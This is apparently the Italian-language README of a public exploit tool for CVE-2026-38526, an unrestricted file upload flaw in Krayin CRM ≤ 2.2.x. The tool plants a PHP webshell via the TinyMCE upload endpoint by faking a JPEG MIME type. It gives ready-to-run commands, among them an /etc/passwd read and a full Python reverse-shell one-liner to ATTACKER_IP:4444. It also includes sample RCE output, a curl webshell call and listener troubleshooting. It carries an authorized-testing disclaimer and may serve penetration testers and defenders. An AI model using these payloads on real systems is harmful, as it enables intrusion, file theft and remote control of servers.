
Automated exploit for Krayin CRM ≤ 2.2.x.
Exploit automatizzato per Krayin CRM ≤ 2.2.x. Questo script sfrutta una vulnerabilità di caricamento file senza restrizioni nell'endpoint TinyMCE (/admin/tinymce/upload), aggira la validazione del tipo MIME fingendo image/jpeg, carica una webshell PHP ed esegue comandi arbitrari con i privilegi del server web.
| Proprietà | Valore |
|---|---|
| ID CVE | CVE-2026-38526 |
| Software interessato | Krayin CRM ≤ 2.2.x |
| Tipo di vulnerabilità | Caricamento file senza restrizioni → Esecuzione di codice remoto |
| Autenticazione | Richiesta (qualsiasi account amministratore valido) |
| Endpoint | POST /admin/tinymce/upload |
requestsgit clone https://github.com/b0nyo/CVE-2026-38526.git
cd CVE-2026-38526
pip3 install -r requirements.txt
python3 CVE-2026-38526.py -i <TARGET_URL> -u <USERNAME> -p <PASSWORD> [-c <COMMAND>]
# Basic check
python3 CVE-2026-38526.py -i http://target.com -u [email protected] -p "AdminPassword123!"
# Custom command
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "cat /etc/passwd"
# Reverse shell
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"
/admin/tinymce/upload con tipo MIME falsificato[*] Target: http://target.com
[*] Username: [email protected]
[*] Authenticating...
[+] Authentication successful
[*] Uploading webshell...
[+] Webshell uploaded: http://target.com/storage/tinymce/abc123def456.php
[+] CVE-2026-38526 CONFIRMED - Remote Code Execution
[*] Executing: id
[*] Output:
────────────────────────────────────────────────────────────────────
uid=33(www-data) gid=33(www-data) groups=33(www-data)
────────────────────────────────────────────────────────────────────
[*] Manual execution (curl):
curl 'http://target.com/storage/tinymce/abc123def456.php?cmd=id'
Autenticazione fallita: Verifica che le credenziali siano corrette e che l'account esista sul target.
Estrazione del token CSRF fallita: Assicurati che il target esegua una versione vulnerabile di Krayin CRM e che l'endpoint di login sia accessibile.
Reverse shell che non si connette: Assicurati che il listener sia in esecuzione (nc -lvnp <PORT>), che le regole del firewall consentano connessioni in uscita e che IP/porta nel payload siano corretti.
Questo strumento è fornito esclusivamente per test di sicurezza autorizzati e scopi educativi. L'accesso non autorizzato a sistemi informatici è illegale. Gli utenti sono gli unici responsabili di assicurarsi di avere la corretta autorizzazione prima di testare qualsiasi sistema di destinazione. L'autore non si assume alcuna responsabilità per usi impropri o danni causati da questo strumento.
b0nyo - Implementazione del PoC
TREXNEGRO - Scoperta della vulnerabilità
| Flag | Descrizione | Esempio |
|---|
-i | URL di destinazione (con o senza http://) | http://target.com o target.com |
-u | Email/nome utente amministratore | [email protected] |
-p | Password amministratore | AdminPassword123! |
-c | Comando da eseguire (predefinito: id) | whoami |